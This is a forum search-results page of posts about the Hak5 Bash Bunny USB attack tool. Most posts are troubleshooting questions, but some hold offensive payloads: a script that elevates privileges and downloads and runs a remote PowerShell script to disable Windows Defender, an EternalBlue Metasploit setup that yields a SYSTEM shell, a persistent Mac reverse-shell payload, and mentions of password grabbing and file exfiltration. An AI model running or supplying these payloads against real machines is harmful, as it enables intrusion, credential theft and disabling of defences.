
Showing results for tags 'bashbunny'.




Found 97 results

  1. Hi everyone, I'm totally new to this, but I recently got my Bash Bunny and got the payloads from GitHub. When I copy and paste the payloads to switch 1 and plug it into my laptop, it creates a file in loot, "PasswordGrabber", but there isn't anything in the folder.
  2. Hello, just asking you guys: is the BB worth it in 2020? I mean, is all of it detected by AV, and does it run? Also, how long does the Bunny work? Does it turn into a DedBunny easily, or does it have a long life?
  3. Hi all, I need some help because I can't get quickcreds to run on my bashbunny. I am using Windows 10 for the bashbunny setup. ###Bashbunny in arm mode I copied the 1.6 firmware from https://downloads.hak5.org/bunny to the root of my bash bunny. Replugged the bashbunny and waited for the red blinking light to stop. I checked the version.txt in root, which confirmed 1.6_305. I downloaded the responder and the impacket from here https://forums.hak5.org/topic/40971-info-tools/ and placed the two files in the tools directory: responder-bunny.deb & impacket-bunny.deb. Then I unplugged and plugged the bashbunny back in and checked that the tools folder was empty. Then I connected to the bashbunny and checked that the folders responder and impacket were copied to the device. Then I ran root@bunny:/tools/impacket# python setup.py install I then copied the quick creds payload to "D:\payloads\switch1\payload.txt" and safely ejected the bashbunny. ###Bashbunny in switch position 1 I plugged the bashbunny into my Windows 10 machine and the light is just solid red. I waited for 5 hours and the light was still unchanged. Any ideas what I am doing wrong? Is quickcreds still working on firmware 1.6? Do you have any links to current tutorials or walkthroughs? Any help is much appreciated.
  5. Reverse Shell Mac for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP. Targets MacOS (OSX may work but has not been tested) Connection can be closed and reconnected at any time Deploys in roughly 30 sec (working on making it faster) Works well with NetCat as the listener Requirements Have a working Bash Bunny :) and a victim with MacOS STATUS LED STATUS Purple Setup Amber (Single Blink) Installing connect.sh script Amber (Double Blink) Creating cron job White (Fast Blink) Cleaning up Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from MacPersistentReverseShell to either switch folder Edit the connect.sh file and replace the placeholder IP with attacker's IP and the port with whichever port you like to use (I use 1337 ?) Save the connect.sh file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the connect.sh file on whichever program you'd like (I use NetCat) If using NetCat, run the command nc -nlvp 1337 (replace the port with the port in connect.sh) Wait for connection (Should take no longer than 1 minute as the cron job runs every minute) Once a bash shell prompt appears...YOU'RE DONE!! ? and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download.
  6. DisableD3f3nd3r This payload was created out of frustration of people asking how to disable Windows Defender via BashBunny, Rubber-Ducky. I have released payloads for both devices. This is just a basic Powershell "Download String" function to pull from a public Gist/GitHub RAW code (or any other RAW code format). The script will attempt to escalate to Administrator to perform "Disabling Defender". Source Code of the Powershell Script: https://gist.github.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc The Payload: #!/bin/bash # # Title: Disable D3f3nd3r (BashBunny) # Description: This Payload disables Windows Defender using Powershell, Works also for the Hak5 # Rubber Ducky or any HID device that supports Quacking. # Author: REDD of Private-Locker # Version: 1.0 # Category: Disable Security # Target: Windows # # Source: https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1 # LED SETUP ATTACKMODE HID LED ATTACK RUN WIN "powershell -NoP -NonI -W Hidden -Exec Bypass -c \"Start-Process cmd -A '/t:4f'-Verb runAs\"" Q LEFTARROW; Q ENTER; Q STRING "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/PrivateLocker/6711c4fe88eae75774284bd6efc377dc/raw/30c9a50a3dd9bd2624cdccd1d6325f36dc6849a4/disable.ps1');\"" Q ENTER; sleep 1; Q STRING "exit"; Q ENTER; LED FINISH
  7. My latest BashBunny-Challenge.....MSF - MS17_010 - BashBunny Thanks to Astr0baby, iam just a sharer of his excellent thoughts Lets go..... Make sure to set some date for TLS/SSL to work ;) # date -s "20170925" Add this to /etc/apt/sources.list deb http://http.us.debian.org/debian/ jessie-updates main # apt-get update # apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev # curl -sSL https://get.rvm.io | bash -s stable # source /etc/profile.d/rvm.sh # rvm requirements # rvm list known # rvm install 2.4.1 # vi /root/.bashrc Add at the end source /etc/profile/rvm.sh rvm use 2.4.1 --default # mkdir /root/METASPLOIT # cd /root/METASPLOIT/ # wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh # chmod +x msf_vps_installer.sh # ./msf_vps_installer.sh # git config --global user.name "USER" # git config --global user.email "user@example.com" # ./msfupdate Check the /etc/dhcp/dhcpd.conf range 172.16.64.10 - 172.16.64.12 and set to only one value range 172.16.64.64 - 172.16.64.64 Save this to ~/metasploit-framework as cmd.rc ----- use exploit/windows/smb/ms17_010_eternalblue set PAYLOAD windows/x64/exec set RHOST 172.16.64.64 set CMD cmd.exe exploit ----- The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked) If the target is locked we can use another payload such this one So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1 … This can be easily scripted via Metasploit RC script so ;) The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position . So ideally this would look like this (switch1 or switch 2) payload.txt #!/bin/bash LED SETUP ATTACKMODE RNDIS_ETHERNET #Set some current time ..... 
check your watch date -s "20170523 23:23" LED ATTACK /root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & LED FINISH The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device create. Default Windows system has a firewall on so the attack wont work as the port is blocked. For the demonstration purpose we assume there is no firewall on .. After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :)
  8. Hey guys, I'd like to know how to emulate a mouse click at a certain position (x,y) on the screen. We must use the VID/PID of a mouse, I know that; then how do I adjust the payload to make a click?
  9. Hi, just wondering if anyone could give me some guidance. I work in the security team at a company, and I want to roll out a SIEM agent to developers' laptops. I need to install this agent as quickly as possible on Linux/Mac boxes whilst they are locked or unlocked (devs don't want to do it themselves and are pretty reluctant about handing over their laptops). The agent is basically a bash script install... chmod +x & ./<filename> I think I could use my bashbunny to quickly walk over to the devs' laptops, put the USB in... and job done.... So my question is: if I run the install via a payload, will it install on the bashbunny OS or the laptop I've plugged it into? Or will I have to copy it to the remote OS and use a series of key presses to run it? Any advice would be great. Thanks
  10. Hi, I've just received my Bash Bunny. The first thing I did was download and run bunnyupdater.exe. I'm currently at version 1.6_305 with the \payloads\library full of payloads. When connecting the BB to a Windows 10 machine, I can see things moving (like a PowerShell window opening and "start > run" text). I can also see that the payloads are creating the needed loot folders. But eventually these folders are empty. Among others I've tried using: WiPassDump, WifiPass, PasswordGrabber, Ascii-Prank and others. Nothing in the loot folder, and the "Ascii-Prank" didn't do anything. I tried it on 3 different computers (all Windows 10). Any ideas on what could be the problem? Is there a way to debug a PAYLOAD so I'd see which command fails? I'd appreciate any help.
  11. Shanegal

    shane

    Hey guys, so I had some trouble with the screaming payload of doom payload, so I've adapted the wallpaper changer payload to do basically the same thing, but instead of transferring the wallpaper jpeg, it transfers the .wav file from the bash bunny. Everything kinda works apart from the transferred wav file, which keeps showing up as 0kb after the script has run. Can anyone help me with this please? Here is the script I have made, and I've attached the full payload at the bottom: LED SETUP ATTACKMODE HID RNDIS_ETHERNET GET HOST_IP GET SWITCH_POSITION udisk mount cd /root/udisk/payloads/$SWITCH_POSITION python -m SimpleHTTPServer 80 & LED ATTACK Q GUI r Q DELAY 500 Q STRING "cmd /C \"start /MIN powershell iwr $HOST_IP/S.WAV > %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f" Q ENTER LED G SUCCESS s.wav screamer payload.txt
  12. Just got a new bash bunny, having a problem with switch position 1; position 2 works fine. #locked LED M FAST ATTACKMODE HID QUACK GUI This script is in both folders as a payload; again, it runs fine in position 2. When in position 1, the LED goes solid magenta, then switches to flashing blue, and the bunny folder then opens. Any ideas as to why switch position 1 is not working?
  13. tcunha

    Updating BB

    I got my bash bunny at the 1.3 firmware version and tried to update, but after that it stopped working. Now when I insert the bash bunny into the computer, it turns the green light on for a second and then turns off the LED. I tried a factory reset but it doesn't work.
  14. Hello, having received my new toy recently (bashbunny) : I tried to use some scripts like "wallpaper-changer-of-doom" except it didn't work at home. Here is the script: https://github.com/jcardonne/Bashbunny-payloads/blob/master/wallpaper-prank If some of you have any suggestions, I'm interested:) Affectionately, jcardonne
  15. I have been trying to figure out a problem with this payload, and for some reason I just can't get it to work. I have impacket in my tools file and installed. When I plug my Bunny in, it goes through the colors but gets stuck on the blue color, and I can't figure out why. Does anyone have the same problem?
  16. I just got my new bash bunny! I'm so excited to start using. One thing I noticed is I am unable to get the "windows key" to work. Specifically I am trying to open a command prompt but it is not working. I noticed when I use the combination of "Q GUI R" it actually presses "ALT + R". Bashbunny is running version 1.6 My laptop is a Lenovo T480 Running Windows 10 1809 ### PAYLOAD ATTACKMODE HID Q SET_LANGUAGE US Q DELAY 5000 LED M, R B Q GUI R Q DELAY 500 Q STRING cmd Q DELAY 500 Q ENTER LED G ### config.txt #!/bin/bash #This configuration file is used to set default variables DUCKY_LANG us
  17. I'm trying to install impacket and responder to my BB using the .deb files provided on another thread; however, my bunny doesn't seem to recognise the updated tools folder. When I copy the files, eject and plug back in, it just boots as normal and doesn't copy anything to its /tools on its Linux partition. I found a previous thread saying to delete everything, change the version.txt file to an earlier version and run the updater, but I don't wanna mess it up any more than it already is. I've tried restoring by inducing 3 failed boots to restore to factory, but that hasn't seemed to work.
  18. So I wanted to know if this was safe. I made a bunny script that, when plugged into a Windows PC, would upload specific files to a folder in my gdrive. I made this a project for myself because I was bored. I manipulated the "SmartFileExtract_Exfiltrator" code and used a gdrive software to make it work. How bad can this be and should it even exist at all?
  19. Hallo!! This is my payload, just a python smb server that points to the switch folder. PROBLEM: it creates the share, but I can't access the files, because the /root/udisk is not mounted. If I boot the bunny in RNDIS, go to the console and do "udisk mount", I can access the files, but I can't mount udisk from inside a payload. Any ideas? Is there anything I'm missing? Thx, and keep on developing!! :) #!/bin/bash LED SETUP GET SWITCH_POSITION SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION LOOTDIR=$SWITCHDIR/loot LED STAGE1 ATTACKMODE RNDIS_ETHERNET udisk mount python /tools/impacket/examples/smbserver.py e $SWITCHDIR & LED FINISH
  20. Hi, I got the internet connection working, ssh'd in. Did apt-get update, then apt-get upgrade. Now I'm unable to get any result from GET TARGET_IP. I did the firmware reset, but am still having issues. LED R SOLID ATTACKMODE ECM_ETHERNET LOOTDIR='/root/udisk/loot/IP' mkdir -p $LOOTDIR GET TARGET_IP echo "IP: $TARGET_IP" >> $LOOTDIR/IP.log LED G SOLID Running the above now gives me a file without the Target IP within. Any ideas?
  21. This is a little later than I had liked, but I'm finally ready for an 'Alpha' release. From the team that brought you https://ducktoolkit.com I am happy to announce https://bunnytoolkit.com The concept is fairly simple. All the payloads that are in the GitHub can be opened in the browser. You can then edit the files in the browser, make changes as you like, and once you're happy with the changes click the download button to get your payload folder. Copy the contents of this into a switch position and away you go. For those who need a quick way of creating their own payloads we have the custom payload wizard. Answer some questions or pick a template, and when you click finish you get a page that contains all the base templates, which you can then add your own code to and save as you do with the payload editor above. I will continue to add more custom features to the wizard and welcome any feedback or thoughts you may have.
  22. I am trying to edit the password grabber payload.txt so that the Finish LED will only turn on once laZagne.exe has finished and closed, because right now it turns on after 10 seconds while laZagne is still running, and if I remove the USB at that point, all of the excavated passwords are lost. I'd like it to work similar to PowerShell, where if I Start-Process -filepath -wait it will wait to move on to the next line until the process has finished. The issue is, WAIT on the bunny script means wait for a switch position change, and for some reason I can't seem to get grep to find the word password in the password.txt file. Any assistance/suggestions are appreciated; I just want the finish LED to actually mean finished.
  23. See some people getting stuck with updating bunnies and tools etc., so I put together a quick list of what I did from a brand new bash bunny on my Linux box. I'm sure there are some differences with OSX and Windows, but in general with adaptation or tweaks this should work for all as a general outline. 1. Read the wiki - seriously, even if you don't remember it all, know where it is and use it for reference. 2. Switch position to 3 (closest to USB) and insert into the PC. With mine I got a blue light. I also backed up the original payloads dir but it's not required. 3. Clone the payloads GitHub locally or download the zip and extract the contents. 4. Copy the payload folder you just cloned or extracted to the bash bunny storage and overwrite all. You now have the latest payloads. At this point if you were to unplug the bunny, select switch 1 or 2 and then reinsert, you would see a purple light rather than the blue one that came from the factory (at least mine did). 5. Some payloads require dependencies, such as quick creds. You install the dependencies using the tools_installer payload, so it's worth running this payload as your first payload. On the Bashbunny storage delete the payload in switch 1 or 2 and then CUT the contents of /payloads/library/tools_installer/ to the switch folder of choice. DON'T copy it, as there is a slight bug if you have 2x copies of this payload on the bashbunny storage when it's run. Unplug the bunny and select the switch to match where you placed the payload and reinsert the bunny. If all goes well you should eventually see a white LED. If you see a red LED you may need to check the forums. From this point you're ready to try other payloads or start developing new ones. Talking of which I almost forgot DuckToolkit adds support for new languages. and uses the Ducktoolkit python library for encoding. 
I had some issues getting the bunny online with ICS on Linux, but it was mostly down to me not reading things in the bb.sh ICS script; I will point them out in case others do the same. 1. A factory fresh bashbunny can only ICS when the switch is in position 1 or 2, not in arming mode position 3. There is no Ethernet device on a factory fresh bunny in arming mode. 2. When you download and run the bb.sh it should first be run without the bashbunny inserted, and when the script gets to stage 3 you insert the bashbunny to complete the guided config. 3. Just because you configured the bb.sh does not mean you're online; you still need to hit C to connect with the current configuration and start ICS. So from here you should have a Bashbunny with up-to-date payloads and dependencies installed, and you are able to ICS to get it online if required. Hope this helps some people.
  24. The Bash Bunny is brilliant. It can already emulate USB devices such as keyboards, USB to Ethernet adapters, serial devices and mass storage devices. I don’t know how Hak5 have implemented the emulation features, but I imagine the Bash Bunny could potentially emulate other USB devices...? My question is what other USB devices would be really interesting to see implemented? How about USB fingerprint readers, for example? Could this allow a current PC to divulge information about a user’s fingerprint, or perhaps allow another fingerprint to be loaded onto the system? I’m really interested in how this could be implemented, and what devices could be emulated. Please let me know what you think! -MB60893.
  25. Hello Guys! First a big welcome to all! I got some HAK5 gear and I'm very fascinated by it. I've also read here since I got the first gear to find help. And usually I've got a solution for me - but now I don't know how to go on... My BB won't write special chars. Neither with the German language file nor with standard US language... All upper- and lowercase letters and numbers are working without problems. But special chars... Nothing... First I thought it's the German .json file because there were no Umlauts and some special chars seemed to have the wrong scancode. So I wrote my own .json file - Nothing.... Next day the new German .json with Umlauts was available - Nothing. I have tried all commands I found anywhere to change language: - Nothing LANGUAGE='de' LANGUAGE=de LANGUAGE= de DUCKY_LANG='de' DUCKY_LANG=de DUCKY_LANG= de +DUCKY_LANG=de +DUCKY_LANG= de +DUCKY_LANG='de' QUACK SET_LANGUAGE de QUACK SET_LANGUAGE 'de' SET_LANGUAGE de SET_LANGUAGE 'de' So I've decided to try out with US Language. Changed keyboard language - Nothing.... I get no special chars... Anyone have an idea I can try yet? Thanks and lovely Greets :-)